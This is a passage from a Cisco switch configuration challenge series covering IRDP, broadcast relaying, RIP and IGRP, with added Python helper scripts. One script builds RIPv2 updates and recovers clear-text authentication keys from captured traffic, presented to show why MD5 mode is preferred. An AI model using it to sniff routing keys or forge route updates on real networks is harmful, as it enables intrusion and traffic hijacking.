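    short form of 0001.0001.0001. Returns the usual aa:bb:cc:dd:ee:ff string."""
    groups = hhh.lower().split(".")
    if len(groups) != 3 or not all(re.fullmatch(r"[0-9a-f]{1,4}", g) for g in groups):
        raise ValueError(f"not an H.H.H address: {hhh!r}")
    raw = "".join(g.zfill(4) for g in groups)
    return ":".join(raw[i:i + 2] for i in range(0, 12, 2))


ARP_RE = re.compile(r"^\s*(?:\(config\)#\s*)?arp\s+(\d{1,3}(?:\.\d{1,3}){3})\s+"
                    r"([0-9a-fA-F]{1,4}(?:\.[0-9a-fA-F]{1,4}){2})\b")


def parse_static_arp(config_text):
    """Collect global 'arp A.B.C.D H.H.H [type]' lines into {ip: canonical_mac}."""
    table = {}
    for line in config_text.splitlines():
        m = ARP_RE.match(line)
        if m:
            table[m.group(1)] = cisco_mac_to_canonical(m.group(2))
    return table


def check_arp_traffic(static_table, observed):
    """observed: iterable of (sender_ip, sender_mac) taken from ARP replies on the segment.
    Returns (conflicts, contested): conflicts are replies that contradict a static entry,
    as (ip, expected_mac, seen_mac); contested maps any IP claimed by more than one MAC
    to the sorted list of those MACs."""
    conflicts, seen_by_ip = [], defaultdict(set)
    for ip, mac in observed:
        mac = mac.lower()
        seen_by_ip[ip].add(mac)
        if ip in static_table and static_table[ip] != mac:
            conflicts.append((ip, static_table[ip], mac))
    contested = {ip: sorted(macs) for ip, macs in seen_by_ip.items() if len(macs) > 1}
    return conflicts, contested


# Constructed inputs: the page's static entry, and four ARP replies of which two are bogus.
STATIC_CONFIG = "(config)# arp 1.2.3.4 1.1.1 arpa"
OBSERVED_REPLIES = [
    ("1.2.3.4", "00:01:00:01:00:01"),   # matches the static entry
    ("1.2.3.4", "de:ad:be:ef:00:01"),   # someone else answering for the gateway
    ("1.2.3.9", "00:50:56:00:00:09"),
    ("1.2.3.9", "00:50:56:00:00:0a"),   # second MAC for the same IP
]

if __name__ == "__main__":
    static = parse_static_arp(STATIC_CONFIG)
    print("static:", static)
    print("conflicts / contested:", check_arp_traffic(static, OBSERVED_REPLIES))
```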

Cisco Switch Challenge 63


Area: Switches - IP Unicast Routing (IRDP)
Outline
This challenge involves configuring ICMP Router Discovery Protocol (IRDP, RFC 1256), with which a router advertises itself on a segment so that hosts can learn a default gateway without static configuration. For this it sends out router advertisement packets. IRDP carries no authentication, so enable it only on interfaces whose hosts are meant to learn their gateway this way.
Objectives
The objectives of this challenge are to:

Define Layer 3 operation on Fa0/1.
Enable IRDP.
Define IRDP details.

The commands used are:


> enable
# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip irdp
(config-if)# ip irdp multicast
(config-if)# ip irdp maxadvertinterval 10
(config-if)# ip irdp holdtime 10
(config-if)# ip irdp minadvertinterval 5
(config-if)# ip irdp preference 0

Example
> enable
# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip irdp ?
  <cr>
  address            addresses to proxy-advertise
  holdtime           how long a receiver should believe the information
  maxadvertinterval  maximum time between advertisements
  minadvertinterval  minimum time between advertisements
  multicast          advertisements are sent with multicasts
  preference         preference level for this interface
(config-if)# ip irdp
(config-if)# ip irdp multicast
(config-if)# ip irdp maxadvertinterval ?
  0         advertise only when solicited
  <4-1800>  maximum time between advertisements (default 600 seconds)
(config-if)# ip irdp maxadvertinterval 10
(config-if)# ip irdp holdtime ?
  <0-9000>  holdtime (default 1800 seconds)
(config-if)# ip irdp holdtime 10
(config-if)# ip irdp minadvertinterval ?
  <3-1800>  minimum time between advertisements (default 450 seconds)
(config-if)# ip irdp minadvertinterval 5
(config-if)# ip irdp preference ?
  <-2147483648 - 2147483647>  preference for this address (higher values preferred)
(config-if)# ip irdp preference 0

Notes

The defaults of minadvertinterval and holdtime are derived from maxadvertinterval: minadvertinterval defaults to 75% of maxadvertinterval and holdtime to three times maxadvertinterval. Setting maxadvertinterval resets both to those derived values, so it must be set first; minadvertinterval and holdtime can then be customised. minadvertinterval must not exceed maxadvertinterval, and holdtime should not be less than maxadvertinterval, or hosts will discard the route between two advertisements.
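The ordering trap described in the Notes is easy to reproduce. The following Python script is an added example and not part of the NetworkSims page: it models the three ip irdp timers with the defaults and ranges shown in the help output above, re-derives minadvertinterval and holdtime whenever maxadvertinterval is set, and validates the result against the RFC 1256 constraints. Truncating the 75% value to a whole second is an assumption about how IOS rounds; the two command sequences are constructed for the example.

```python
MAX_DEFAULT = 600       # seconds; from the IOS help text on the page
HOLD_FACTOR = 3         # holdtime defaults to 3 x maxadvertinterval
MIN_FACTOR = 0.75       # minadvertinterval defaults to 75% of maxadvertinterval


def derive_from_max(max_interval):
    # Truncating the 75% value to an integer is an assumption about IOS rounding.
    return {"maxadvertinterval": max_interval,
            "minadvertinterval": int(max_interval * MIN_FACTOR),
            "holdtime": max_interval * HOLD_FACTOR}


def default_timers():
    return derive_from_max(MAX_DEFAULT)


def apply_command(timers, command):
    """Apply one 'ip irdp <timer> <seconds>' line to the timer dict and return it.
    Setting maxadvertinterval re-derives the other two, which is why it must come first."""
    words = command.split()
    if len(words) < 2:
        raise ValueError(f"incomplete command: {command!r}")
    name, value = words[-2], int(words[-1])
    if name == "maxadvertinterval":
        if value != 0 and not 4 <= value <= 1800:
            raise ValueError("maxadvertinterval is 0 or 4-1800")
        timers.update(derive_from_max(value))
    elif name == "minadvertinterval":
        if not 3 <= value <= 1800:
            raise ValueError("minadvertinterval is 3-1800")
        timers["minadvertinterval"] = value
    elif name == "holdtime":
        if not 0 <= value <= 9000:
            raise ValueError("holdtime is 0-9000")
        timers["holdtime"] = value
    else:
        raise ValueError(f"not a timer: {name}")
    return timers


def configure(commands):
    timers = default_timers()
    for c in commands:
        apply_command(timers, c)
    return timers


def validate(timers):
    """RFC 1256 consistency rules: min <= max, and hosts must keep the route at least
    until the next advertisement is due."""
    mx, mn, hold = (timers[k] for k in ("maxadvertinterval", "minadvertinterval", "holdtime"))
    problems = []
    if mx and mn > mx:
        problems.append("minadvertinterval exceeds maxadvertinterval")
    if mx and hold < mx:
        problems.append("holdtime is shorter than maxadvertinterval")
    return problems


if __name__ == "__main__":
    page_order = ["ip irdp maxadvertinterval 10", "ip irdp holdtime 10", "ip irdp minadvertinterval 5"]
    wrong_order = ["ip irdp holdtime 10", "ip irdp minadvertinterval 5", "ip irdp maxadvertinterval 10"]
    print("page order :", configure(page_order), validate(configure(page_order)))
    print("wrong order:", configure(wrong_order), validate(configure(wrong_order)))
```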

Cisco Switch Challenge 64


Area: Switches - IP Unicast Routing (Broadcast handling)
Outline
This challenge involves defining which UDP ports are relayed when broadcasts are forwarded (ip forward-protocol), and enabling the translation of a subnet-directed broadcast into a physical (Layer 2) broadcast on an interface (ip directed-broadcast). Directed broadcasts have been disabled by default since IOS 12.0, because a device that forwards them can be used to amplify traffic onto a segment from outside it; enable the feature only on interfaces that need it, preferably with the optional access list shown below to limit which sources may use it.
Objectives
The objectives of this challenge are to:

Define Layer 3 operation on Fa0/1.
Define which UDP ports are relayed when broadcasts are forwarded (ip forward-protocol).
Enable broadcast-to-physical translation on an interface (ip directed-broadcast).

The commands used are:


> enable
# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip directed-broadcast
(config-if)# exit
(config)# ip forward-protocol udp time
(config)# ip forward-protocol udp echo
(config)# ip forward-protocol udp syslog

Example
> enable
# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip directed-broadcast ?
  <1-199>      A standard IP access list number
  <1300-2699>  A standard IP expanded access list number
  <cr>
(config-if)# ip directed-broadcast
(config-if)# exit
(config)# ip forward-protocol ?
  nd             Sun's Network Disk protocol
  sdns           Network Security Protocol
  spanning-tree  Use transparent bridging to flood UDP broadcasts
  turbo-flood    Fast flooding of UDP broadcasts
  udp            Packets to a specific UDP port
(config)# ip forward-protocol udp ?
  <0-65535>    Port number
  biff         Biff (mail notification, comsat, 512)
  bootpc       Bootstrap Protocol (BOOTP) client (68)
  bootps       Bootstrap Protocol (BOOTP) server (67)
  discard      Discard (9)
  dnsix        DNSIX security protocol auditing (195)
  domain       Domain Name Service (DNS, 53)
  echo         Echo (7)
  isakmp       Internet Security Association and Key Management Protocol (500)
  mobile-ip    Mobile IP registration (434)
  nameserver   IEN116 name service (obsolete, 42)
  netbios-dgm  NetBios datagram service (138)
  netbios-ns   NetBios name service (137)
  netbios-ss   NetBios session service (139)
  ntp          Network Time Protocol (123)
  pim-auto-rp  PIM Auto-RP (496)
  rip          Routing Information Protocol (router, in.routed, 520)
  snmp         Simple Network Management Protocol (161)
  snmptrap     SNMP Traps (162)
  sunrpc       Sun Remote Procedure Call (111)
  syslog       System Logger (514)
  tacacs       TAC Access Control System (49)
  talk         Talk (517)
  tftp         Trivial File Transfer Protocol (69)
  time         Time (37)
  who          Who service (rwho, 513)
  xdmcp        X Display Manager Control Protocol (177)
  <cr>
(config)# ip forward-protocol udp time
(config)# ip forward-protocol udp echo
(config)# ip forward-protocol udp syslog

Cisco Switch Challenge 65


Area: Switches - IP Unicast Routing (Broadcast handling/helper address)
Outline
This challenge involves defining which UDP ports are relayed when broadcasts are forwarded (ip forward-protocol), and a helper address to which those broadcasts are relayed as unicasts (ip helper-address). The forward-protocol list is global; the helper address is set on the interface on which the broadcasts arrive.
Objectives
The objectives of this challenge are to:

Define Layer 3 operation on Fa0/1.
Define which UDP ports are relayed when broadcasts are forwarded (ip forward-protocol).
Define a helper address.

The commands used are:


> enable
# config t
(config)# ip forward-protocol udp time
(config)# ip forward-protocol udp echo
(config)# ip forward-protocol udp syslog
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip helper-address 1.2.3.4

Example
> enable
# config t
(config)# ip forward-protocol udp time
(config)# ip forward-protocol udp echo
(config)# ip forward-protocol udp syslog
(config)# ip forward-protocol ?
  nd             Sun's Network Disk protocol
  sdns           Network Security Protocol
  spanning-tree  Use transparent bridging to flood UDP broadcasts
  turbo-flood    Fast flooding of UDP broadcasts
  udp            Packets to a specific UDP port
(config)# ip forward-protocol spanning-tree
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip helper-address ?
  A.B.C.D  IP destination address
(config-if)# ip helper-address 1.2.3.4

Cisco Switch Challenge 66


Area: Switches - IP Unicast Routing (Broadcast handling/IP flooding)
Outline
This challenge involves defining the address used for broadcasts sent from an interface (ip broadcast-address), and enabling fast flooding of UDP broadcasts over the spanning tree (ip forward-protocol turbo-flood).
Objectives
The objectives of this challenge are to:

Define Layer 3 operation on Fa0/1.
Define the broadcast address of the interface.
Enable turbo-flood support.

The commands used are:


> enable
# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip broadcast-address 1.2.3.4
(config-if)# exit
(config)# ip forward-protocol turbo-flood

Example
> enable
# config t
(config)# ip forward-protocol ?
  nd             Sun's Network Disk protocol
  sdns           Network Security Protocol
  spanning-tree  Use transparent bridging to flood UDP broadcasts
  turbo-flood    Fast flooding of UDP broadcasts
  udp            Packets to a specific UDP port
(config)# ip forward-protocol turbo-flood
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip broadcast-address ?
  A.B.C.D  IP broadcast address
(config-if)# ip broadcast-address 1.2.3.4
(config-if)# exit

turbo-flood only speeds up the flooding that ip forward-protocol spanning-tree (previous challenge) enables; on its own it has no effect.
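Challenges 64 to 66 configure three separate decisions that a router makes about a broadcast: which UDP ports are eligible for relaying, where they are relayed to, and whether a routed packet addressed to a subnet's broadcast address is put on the wire as a Layer 2 broadcast. The following Python script is an added example, not part of the NetworkSims page: it parses those commands into a small router model and answers both questions for a given packet. The list of ports that IOS relays by default once a helper address exists (Time, TACACS, DNS, BOOTP server and client, TFTP, NetBIOS name and datagram services) and the port-name table are reproduced from memory of the IOS documentation; the sample configuration is constructed for the example.

```python
import re

UDP_PORT_NAMES = {"biff": 512, "bootpc": 68, "bootps": 67, "discard": 9, "domain": 53, "echo": 7,
                  "ntp": 123, "snmp": 161, "snmptrap": 162, "syslog": 514, "tacacs": 49,
                  "tftp": 69, "time": 37, "netbios-ns": 137, "netbios-dgm": 138, "rip": 520}
# Ports IOS relays as soon as an ip helper-address exists (Time, TACACS, DNS, BOOTP
# server and client, TFTP, NetBIOS name and datagram services).
DEFAULT_HELPER_PORTS = frozenset({37, 49, 53, 67, 68, 69, 137, 138})
PROMPT_RE = re.compile(r"^\s*(?:\S*\(config(?:-if)?\)#)?\s*")


def port_number(word):
    return UDP_PORT_NAMES[word] if word in UDP_PORT_NAMES else int(word)


def parse_router(config_text):
    """Global forward-protocol list plus per-interface helper/directed-broadcast settings."""
    router = {"udp_ports": set(DEFAULT_HELPER_PORTS), "interfaces": {}}
    cur = None
    for raw in config_text.splitlines():
        w = PROMPT_RE.sub("", raw).split()
        if not w:
            continue
        if w[0] in ("int", "interface") and len(w) > 1:
            cur = router["interfaces"].setdefault(
                w[1].lower(), {"helpers": [], "directed_broadcast": False})
        elif w[:3] == ["ip", "forward-protocol", "udp"] and len(w) > 3:
            router["udp_ports"].add(port_number(w[3]))
        elif w[:4] == ["no", "ip", "forward-protocol", "udp"] and len(w) > 4:
            router["udp_ports"].discard(port_number(w[4]))
        elif cur is not None and w[:2] == ["ip", "helper-address"] and len(w) > 2:
            cur["helpers"].append(w[2])
        elif cur is not None and w[:2] == ["ip", "directed-broadcast"]:
            cur["directed_broadcast"] = True
        elif cur is not None and w[:3] == ["no", "ip", "directed-broadcast"]:
            cur["directed_broadcast"] = False
    return router


def relay_targets(router, ingress, protocol, dport):
    """A limited broadcast (255.255.255.255) received on `ingress` is re-sent as a unicast
    to each helper address, but only if it is UDP to a port on the forward-protocol list.
    Returns the list of unicast destinations (empty = not relayed)."""
    iface = router["interfaces"].get(ingress)
    if iface is None or protocol != "udp" or dport not in router["udp_ports"]:
        return []
    return list(iface["helpers"])


def directed_broadcast_delivered(router, egress):
    """A packet routed to the subnet broadcast address of `egress` only becomes a Layer 2
    broadcast on that segment if ip directed-broadcast is set there; with the default
    (no ip directed-broadcast, IOS 12.0 and later) it is dropped, which is what stops
    an outsider from amplifying traffic onto the segment."""
    iface = router["interfaces"].get(egress)
    return bool(iface and iface["directed_broadcast"])


# Constructed sample: Challenges 64 and 65 combined on Fa0/1, plus a second routed port.
SAMPLE_CONFIG = """
(config)# ip forward-protocol udp time
(config)# ip forward-protocol udp echo
(config)# ip forward-protocol udp syslog
(config)# no ip forward-protocol udp tftp
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip helper-address 1.2.3.4
(config-if)# ip directed-broadcast
(config)# int fa0/2
(config-if)# no switchport
"""

if __name__ == "__main__":
    r = parse_router(SAMPLE_CONFIG)
    print("syslog broadcast on fa0/1 ->", relay_targets(r, "fa0/1", "udp", 514))
    print("snmp broadcast on fa0/1   ->", relay_targets(r, "fa0/1", "udp", 161))
    print("directed bcast out fa0/1  ->", directed_broadcast_delivered(r, "fa0/1"))
    print("directed bcast out fa0/2  ->", directed_broadcast_delivered(r, "fa0/2"))
```

The relay and the directed-broadcast decision are independent: a helper address never needs ip directed-broadcast unless the helper address itself is a subnet broadcast address.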

Cisco Switch Challenge 67


Area: Switches - IP Unicast Routing (IP Routing / RIP)
Outline
This challenge involves enabling IP routing (ip routing), and configuring RIP.
Objectives
The objectives of this challenge are to:

Enable IP routing.
Define RIP details for the network to broadcast into.

The commands used are:


> enable
# config t
(config)# ip routing
(config)# router rip
(config-router)# network 10.0.0.0
(config-router)# neighbor 10.0.0.1

Example
> enable
# config t
(config)# ip routing
(config)# router ?
bgp
Border Gateway Protocol (BGP)
egp
Exterior Gateway Protocol (EGP)
eigrp
Enhanced Interior Gateway Routing Protocol (EIGRP)
igrp
Interior Gateway Routing Protocol (IGRP)
isis
ISO IS-IS
iso-igrp IGRP for OSI networks
mobile
Mobile routes
odr
On Demand stub Routes
ospf
Open Shortest Path First (OSPF)
rip
Routing Information Protocol (RIP)
static
Static routes
(config)# router rip
(config-router)# ?
Router configuration commands:
address-family
Enter Address Family command mode
auto-summary
Enable automatic network number summarization
default
Set a command to its defaults
default-information
Control distribution of default information
default-metric
Set metric of redistributed routes
distance
Define an administrative distance
distribute-list
Filter networks in routing updates
exit
Exit from routing protocol configuration mode
flash-update-threshold Specify flash update threshold in second
help
Description of the interactive help system
input-queue
Specify input queue depth
maximum-paths
Forward packets over multiple paths
neighbor
Specify a neighbor router
network
Enable routing on an IP network
no
Negate a command or set its defaults
offset-list
Add or subtract offset from IGRP or RIP metrics
output-delay
Interpacket delay for RIP updates
passive-interface
Suppress routing updates on an interface
redistribute
Redistribute information from another routing
protocol
timers
Adjust routing timers
traffic-share
How to compute traffic share over alternate paths
validate-update-source Perform sanity checks against source address of
routing updates
version
Set routing protocol version
(config-router)# network ?
A.B.C.D Network number
(config-router)# network 10.0.0.0
(config-router)# neighbor 10.0.0.1

Cisco Switch Challenge 68



Area: Switches IP Unicast Routing (IP Routing/ RIP)


Outline
This challenge involves enabling IP routing (ip routing), and configuring RIP.
Objectives
The objectives of this challenge are to:

Enable IP routing.
Define RIP version.
Define RIP timers.
Disable auto-summary.

The commands used are:


> enable
# config t
(config)# ip routing
(config)# router rip
(config-router)# version 2
(config-router)# timers basic 10 10 10 10
(config-router)# no auto-summary

Example
> enable
# config t
(config)# ip routing
(config)# router rip
(config-router)# version ?
<1-2> version
(config-router)# timers ?
basic Basic routing protocol update timers
(config-router)# timers basic ?
<0-4294967295> Interval between updates
(config-router)# timers basic 10 ?
<1-4294967295> Invalid
(config-router)# timers basic 10 10 ?
<0-4294967295> Holddown
(config-router)# timers basic 10 10 10 ?
<1-4294967295> Flush
(config-router)# timers basic 10 10 10 10 ?
<1-4294967295> Sleep time, in milliseconds


<cr>
(config-router)# timers basic 10 10 10 10
(config-router)# no ?
address-family Enter Address Family command mode
auto-summary Enable automatic network number summarization
default-information Control distribution of default information
default-metric Set metric of redistributed routes
distance Define an administrative distance
distribute-list Filter networks in routing updates
flash-update-threshold Specify flash update threshold in second
input-queue Specify input queue depth
maximum-paths Forward packets over multiple paths
neighbor Specify a neighbor router
network Enable routing on an IP network
offset-list Add or subtract offset from IGRP or RIP metrics
output-delay Interpacket delay for RIP updates
passive-interface Suppress routing updates on an interface
redistribute Redistribute information from another routing protocol
timers Adjust routing timers
traffic-share How to compute traffic share over alternate paths
validate-update-source Perform sanity checks against source address of routing updates
version Set routing protocol version
(config-router)# no auto-summary

Cisco Switch Challenge 69


Area: Switches IP Unicast Routing (IP Routing/ RIP)
Outline
This challenge involves enabling RIP authentication. RIPv2 authentication uses a key chain; with mode md5 each update carries a keyed-MD5 digest computed with the key, whereas with mode text the key itself is sent in clear in every update and can be read by anyone on the segment.
Objectives
The objectives of this challenge are to:

Enable IP routing.
Define a key chain and key string.
Define RIP version 2.
Enable MD5-authenticated RIP on an interface.

The commands used are:


> enable
# config t
(config)# ip routing
(config)# key chain test
(config-keychain)# key 1
(config-keychain-key)# key-string mykey


(config-keychain-key)# exit
(config-keychain)# exit
(config)# router rip
(config-router)# version 2
(config)# int fa0/1
(config-if)# ip rip authentication key-chain test
(config-if)# ip rip authentication mode md5

Example
> enable
# config t
(config)# ip routing
(config)# key ?
chain
Key-chain management
config-key Set a private configuration key
(config)# key chain ?
WORD Key-chain name
(config)# key chain test
(config-keychain)# ?
Key-chain configuration commands:
default Set a command to its defaults
exit
Exit from key-chain configuration mode
key
Configure a key
no
Negate a command or set its defaults
(config-keychain)# key ?
<0-2147483647> Key identifier
(config-keychain)# key 1
(config-keychain-key)# ?
Key-chain key configuration commands:
accept-lifetime Set accept lifetime of key
default
Set a command to its defaults
exit
Exit from key-chain key configuration mode
key-string
Set key string
no
Negate a command or set its defaults
send-lifetime
Set send lifetime of key
(config-keychain-key)# key-string ?
<0-7> Encryption type (0 to disable encryption, 7 for proprietary)
LINE
The key
(config-keychain-key)# key-string mykey
(config-keychain-key)# exit
(config-keychain)# exit
(config)# router rip
(config-router)# version ?
<1-2> version
(config-router)# version 2
(config)# int fa0/1
(config-if)# ip ri ?
authentication Authentication control
receive
advertisement reception
send
advertisement transmission
v2-broadcast
send ip broadcast v2 update
(config-if)# ip rip a ?
key-chain Authentication key-chain
mode
Authentication mode

(config-if)# ip rip authentication key-chain ?
LINE name of key-chain
(config-if)# ip rip authentication key-chain test
(config-if)# ip rip authentication mode ?
md5 Keyed message digest
text Clear text authentication
(config-if)# ip rip authentication mode md5
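What the two authentication modes put on the wire, as an added example that is not part of the NetworkSims page: the Python below builds RIPv2 response packets the way the challenge configures them (no authentication, mode text, mode md5) and inspects them the way a sniffer or an IDS would. With mode text the key-string travels in clear in the first entry of every update; with mode md5 only a keyed-MD5 digest does, so a capture does not reveal the key, although anyone who holds the key can still forge updates and the sequence number is the only replay protection. The packet layout follows RFC 2453 and RFC 2082; the digest procedure (MD5 over the packet up to and including the trailer header, followed by the key zero-padded to 16 bytes) is RFC 2082's and is assumed here rather than checked against an IOS capture. The route entry is constructed for the example; mykey is the key-string from the challenge.

```python
"""RIPv2 authentication builder/inspector (added example, not NetworkSims code)."""
import hashlib
import hmac
import socket
import struct

RIP_HEADER = struct.Struct("!BBH")   # command, version, must-be-zero
AUTH_HDR = struct.Struct("!HH")      # AFI 0xFFFF, authentication type
ENTRY_LEN = 20
AFI_AUTH = 0xFFFF
AUTH_TRAILER = 1                     # type carried by the keyed-MD5 trailer entry
AUTH_TEXT = 2                        # ip rip authentication mode text
AUTH_MD5 = 3                         # ip rip authentication mode md5


def _key16(key: bytes) -> bytes:
    """RFC 2082 keys are 16 bytes; shorter key-strings are zero-padded (assumption for IOS)."""
    return key[:16].ljust(16, b"\x00")


def _ip(addr: str) -> bytes:
    return socket.inet_aton(addr)


def build_response(routes, mode=None, key=b"", key_id=1, seq=1) -> bytes:
    """Build a RIPv2 Response carrying routes = [(prefix, mask, next_hop, metric), ...]."""
    header = RIP_HEADER.pack(2, 2, 0)   # command 2 = response, version 2
    body = b"".join(struct.pack("!HH4s4s4sI", 2, 0, _ip(p), _ip(m), _ip(nh), metric)
                    for p, m, nh, metric in routes)
    if mode is None:
        return header + body
    if mode == "text":
        # The key itself is the authentication entry: readable by anyone on the segment.
        return header + AUTH_HDR.pack(AFI_AUTH, AUTH_TEXT) + _key16(key) + body
    if mode == "md5":
        # Auth entry: offset of the trailer, key id, digest length, sequence number, 8 reserved.
        trailer_at = RIP_HEADER.size + ENTRY_LEN + len(body)
        auth = AUTH_HDR.pack(AFI_AUTH, AUTH_MD5) + struct.pack(
            "!HBBI8s", trailer_at, key_id, 16, seq, b"\x00" * 8)
        trailer_hdr = AUTH_HDR.pack(AFI_AUTH, AUTH_TRAILER)
        digest = hashlib.md5(header + auth + body + trailer_hdr + _key16(key)).digest()
        return header + auth + body + trailer_hdr + digest
    raise ValueError("mode must be None, 'text' or 'md5'")


def inspect_ripv2(packet: bytes, key: bytes = None) -> dict:
    """Classify a RIPv2 packet's authentication, recover a clear-text key when
    present, and verify the keyed-MD5 trailer when the expected key is supplied."""
    _, version, _ = RIP_HEADER.unpack_from(packet, 0)
    info = {"version": version, "auth": "none", "password": None, "md5_ok": None}
    start, end = RIP_HEADER.size, len(packet)
    if end - start >= ENTRY_LEN and AUTH_HDR.unpack_from(packet, start)[0] == AFI_AUTH:
        auth_type = AUTH_HDR.unpack_from(packet, start)[1]
        if auth_type == AUTH_TEXT:
            info["auth"] = "text"
            info["password"] = packet[start + 4:start + ENTRY_LEN].rstrip(b"\x00").decode("ascii", "replace")
        elif auth_type == AUTH_MD5:
            info["auth"] = "md5"
            trailer_at, key_id, digest_len, seq = struct.unpack_from("!HBBI", packet, start + 4)
            info.update(key_id=key_id, seq=seq)
            trailer = packet[trailer_at:]
            well_formed = (digest_len == 16 and len(trailer) == ENTRY_LEN
                           and AUTH_HDR.unpack_from(trailer, 0) == (AFI_AUTH, AUTH_TRAILER))
            if well_formed:
                end = trailer_at
                if key is not None:
                    expected = hashlib.md5(packet[:trailer_at + 4] + _key16(key)).digest()
                    info["md5_ok"] = hmac.compare_digest(expected, trailer[4:])  # constant-time
            else:
                info["md5_ok"] = False
        start += ENTRY_LEN
    info["routes"] = max(0, (end - start) // ENTRY_LEN)
    return info


if __name__ == "__main__":
    routes = [("10.0.0.0", "255.0.0.0", "0.0.0.0", 1)]  # constructed advertisement
    print(inspect_ripv2(build_response(routes, mode="text", key=b"mykey")))
    print(inspect_ripv2(build_response(routes, mode="md5", key=b"mykey"), key=b"mykey"))
```

Run against a real capture, inspect_ripv2 will print the recovered key-string for any router still using mode text; that is the reason the challenge ends with mode md5.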

Cisco Switch Challenge 70


Area: Switches IP Unicast Routing (IP Routing/ RIP)
Outline
This challenge involves defining summary address and split-horizon.
Objectives
The objectives of this challenge are to:

Enable IP routing.
Define a summary address.
Define no split-horizon.

The commands used are:


> enable
# config t
(config)# ip routing
(config)# router rip
(config-router)# network 10.0.0.0
(config-router)# version 2
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip summary-address rip 1.2.3.4 255.255.0.0
(config-if)# no ip split-horizon

Example
> enable
# config t
(config)# ip routing
(config)# router rip
(config-router)# network 10.0.0.0
(config-router)# version 2
(config)# int fa0/1
(config-if)# no switchport
(config-if)# ip summary-address ?
eigrp Enhanced Interior Gateway Routing Protocol (EIGRP)
rip
Routing Information Protocol (RIP)
(config-if)# ip summary-address r ?


A.B.C.D IP address
(config-if)# ip summary-address r 1.2.3.4 ?
A.B.C.D IP network mask
(config-if)# ip summary-address rip 1.2.3.4 255.255.0.0
(config-if)# no ip ?
Interface IP configuration subcommands:
access-group
Specify access control for packets
accounting
Enable IP accounting on this interface
address
Set the IP address of an interface
authentication
authentication subcommands
bandwidth-percent
Set EIGRP bandwidth limit
bgp
BGP interface commands
broadcast-address
Set the broadcast address of an interface
cef
Cisco Express Forwarding interface commands
cgmp
Enable/disable CGMP
dhcp
Configure DHCP parameters for this interface
directed-broadcast Enable forwarding of directed broadcasts
dvmrp
DVMRP interface commands
hello-interval
Configures IP-EIGRP hello interval
helper-address
Specify a destination address for UDP broadcasts
hold-time
Configures IP-EIGRP hold time
igmp
IGMP interface commands
irdp
ICMP Router Discovery Protocol
load-sharing
Style of load sharing
local-proxy-arp
Enable local-proxy ARP
mask-reply
Enable sending ICMP Mask Reply messages
mrm
Configure IP Multicast Routing Monitor tester
mroute-cache
Enable switching cache for incoming multicast packets
mtu
Set IP Maximum Transmission Unit
multicast
IP multicast interface commands
ospf
OSPF interface commands
pim
PIM interface commands
policy
Enable policy routing
probe
Enable HP Probe support
proxy-arp
Enable proxy ARP
rarp-server
Enable RARP server for static arp entries
redirects
Enable sending ICMP Redirect messages
rgmp
Enable/disable RGMP
rip
Router Information Protocol
route-cache
Enable fast-switching cache for outgoing packets
sap
Session Advertisement Protocol interface commands
sdr
Session Directory Protocol interface commands
security
DDN IP Security Option
split-horizon
Perform split horizon
summary-address
Perform address summarization
unnumbered
Enable IP processing without an explicit address
unreachables
Enable sending ICMP Unreachable messages
urd
Configure URL Rendezvousing
vrf
VPN Routing/Forwarding parameters on the interface
wccp
WCCP interface commands
(config-if)# no ip split-horizon
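Why split horizon is on by default, and what no ip split-horizon gives up, as an added example that is not part of the NetworkSims page: the Python below simulates two RIP routers exchanging updates once per round after the network behind one of them fails. With split horizon the stale route is never advertised back toward its next hop and simply ages out; without it the two routers re-learn the dead route from each other and count up to RIP's infinity metric of 16. The topology, the round-based timers and INVALID_ROUNDS (standing in for the 180-second invalid timer at 30-second updates) are all constructed for the example.

```python
"""Split-horizon versus count-to-infinity simulation (added example, not NetworkSims code)."""
INFINITY = 16        # RIP's unreachable metric
INVALID_ROUNDS = 6   # stands in for the invalid timer: 180 s / 30 s updates


def simulate(split_horizon: bool, max_rounds: int = 60):
    """Two RIP routers, A and B, one link between them.  B was directly
    connected to network N (A reaches N via B at metric 2) and the N link
    has just failed.  Returns (rounds until no router has a route to N,
    highest metric seen along the way)."""
    # table: router -> {dest: [metric, next_hop, rounds_since_refresh]}
    tables = {"A": {"N": [2, "B", 0]}, "B": {}}
    peer_of = {"A": "B", "B": "A"}
    highest = 2
    for rnd in range(1, max_rounds + 1):
        # 1. Each router builds the update it sends to its peer.
        received = {}
        for router, peer in peer_of.items():
            update = {}
            for dest, (metric, next_hop, _) in tables[router].items():
                if split_horizon and next_hop == peer:
                    continue  # never advertise a route back toward its next hop
                update[dest] = metric
            received[peer] = update
        # 2. Each router applies what it received (RFC 2453 rules, simplified).
        for router, peer in peer_of.items():
            for entry in tables[router].values():
                entry[2] += 1
            for dest, adv_metric in received[router].items():
                metric = min(adv_metric + 1, INFINITY)
                highest = max(highest, metric)
                current = tables[router].get(dest)
                if current is None:
                    if metric < INFINITY:
                        tables[router][dest] = [metric, peer, 0]
                elif current[1] == peer or metric < current[0]:
                    # an update from the current next hop is always accepted,
                    # even when it makes the route worse
                    current[0], current[1], current[2] = metric, peer, 0
            # 3. Drop routes that hit infinity or were not refreshed in time.
            tables[router] = {d: e for d, e in tables[router].items()
                              if e[0] < INFINITY and e[2] < INVALID_ROUNDS}
        if not any(tables.values()):
            return rnd, highest
    return None, highest


if __name__ == "__main__":
    print("split horizon on :", simulate(True))    # (6, 2): stale route ages out
    print("split horizon off:", simulate(False))   # (20, 16): count to infinity
```

Disabling split horizon is only ever appropriate on a hub interface of a multipoint link (frame relay and the like) where the spokes cannot hear each other; on the point-to-point Ethernet link of this challenge it just opens the loop shown above.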

Cisco Switch Challenge 71


Area: Switches IP Unicast Routing (IP Routing/IGRP)
Outline
This challenge involves enabling IGRP routing and setting its metric and timer parameters.


Objectives
The objectives of this challenge are to:

Enable IP routing.
Define IGRP details.

The commands used are:


> enable
# config t
(config)# ip routing
(config)# router igrp 111
(config-router)# network 1.2.3.0
(config-router)# neighbor 1.2.3.1
(config-router)# metric maximum-hops 10
(config-router)# timers basic 10 10 10 10

Example
> enable
# config t
(config)# ip routing
